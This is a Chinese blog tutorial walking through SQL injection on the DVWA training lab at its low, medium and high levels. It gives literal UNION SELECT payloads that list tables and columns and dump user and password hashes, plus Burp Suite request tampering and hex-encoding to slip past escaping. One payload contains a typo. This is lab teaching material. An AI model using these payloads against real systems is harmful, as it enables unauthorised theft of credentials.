• DVWA-SQL注入

    一、SQL注入概念

    SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。

    二、手工注入常规思路

      1.判断是否存在注入,注入是字符型还是数字型

      2.猜解SQL查询语句中的字段数

      3.确定回显位置

      4.获取当前数据库

      5.获取数据库中的表

      6.获取表中的字段名

      7.得到数据

    三、DVWA注入分析

      将DVWA的级别设置为low

      

    1.分析源码,可以看到没有对参数做任何的过滤,,直接带入数据库进行查询,分析sql查询语句,可能存在字符型sql注入。

     

     

     

     2.判断sql是否存在存入,,以及注入的类型。1' and '1'='1

     

     3.猜解SQL查询语句中的字段数,1' order by 1#

     

    1' order by 2#

     

    1' order by 3#   从上面两个图,可以说明,,SQL语句查询的表的的字段数位2,

    确定显示的位置(SQL语句查询之后的回显位置)

     

    1' union select 1,2#    #从下图可以看出有2个回显

     

     查询当前的数据库,以及版本

    1' union select version(),database()#

     

    获取数据库中的表,

    1' union select 1, group_concat(table_name) from information_schema.tables where table_schema=database()#

     

    获取表中的字段名,

    1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

     

    获得字段中的数据,

    1' union select user, password from users#

    解析密码的话,,可以去百度搜索MD5(在线破解密码的一个网页)

     

     

    ________________________________________________________________

    ________________________________________________________________

    将DVWA的级别设置为Medium

    中级加入了一些防御,,不让用户输入,只提供选择(可以用burpsuit抓包来绕过),需要把浏览器设置为代理

    分析源码可以看到对参数使用mysql_real_escape_string函数转义sql语句中的一些

    特殊字符,查看sql查询语句可以看出可能存在数字型sql注入。

     

    分析源码

     

    把浏览器设置为代理,,,,设置手动代理时,,将端口设置为8080

    通过burpsuit抓包,修改数据包,,绕过防御。判断注入点,以及注入的类型,下图可以看到,

    存在注入,注入类型是数字型注入。

    1 and 1=1#    3是第二步后才出现的,,此处为了方便理解

     

     

     猜解sql查询语句中的字段个数,,测试字段个数为1,

    1 order by 1#

     

     

     测试字段个数2,1 order by 2#    

     

     

    测试字段个数3,1 order by 3#    返回错误页面,所以字段数位2

     

     

     为了看得方便点,我们选中然后右击,发送给Repeater,,

     这样就不用再返回浏览器查看状态啦,,直接在burpsuit抓包工具下查看

     

    确定回显的位置,下图可以说明有2个回显位置,1 union select 1,2#

     

     

    获取当前数据库的名称以及版本,1 union select database(),version()#

      

    获取数据库中的所有表,

    1 union select 1, group_concat(table_name) from information_schema.tables where table_schema=database()#

     

    获取表中的所有字段名,,考虑到单引号被转义,可以利用16进制绕过。

    1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #

     

    获取字段中的数据,1 union selcect user,password from users#

     

    ____________________________________________________________

     

    _____________________________________________________________

    将DVWA的级别设置为High

    将DVWA设置为高级,可以看出,,点击“here to change your ID”,页面自动跳转,,防御了自动化的SQL注入,分析源码可以看到,对参数没有做防御,,在sql查询语句中限制啦查询条数,,可以通过burpsuit抓包,修改数据包实现绕过。

     

     

     

     

     查看源码

     

     

     

     获取密码,1' union select user,password from users#

     

    ——————————————————————————————————

    ——————————————————————————————————

    将DVWA的级别设置为Impossible,分析源码可以看到使用啦PD0技术,,杜绝啦SQL注入。
  • 相关阅读:
    用TortoiseSVN忽略文件或文件夹(ignore)(网络摘抄记录)
    GridView解决同一行item的高度不一样,如何同一行统一高度问题?
    解决android studio引用远程仓库下载慢(转)
    Databinding在自定义ViewGroup中如何绑定view
    (转 )【Android那些高逼格的写法】InvocationHandler与代理模式
    (转)秒懂,Java 注解 (Annotation)你可以这样学
    View拖拽 自定义绑定view拖拽的工具类
    bcrypt对密码加密的一些认识(学习笔记)
    Node.js+Koa开发微信公众号个人笔记(三)响应文本
    Node.js+Koa开发微信公众号个人笔记(二)响应事件
  • 原文地址:https://www.cnblogs.com/escwq/p/12045890.html
Copyright © 2020-2023  润新知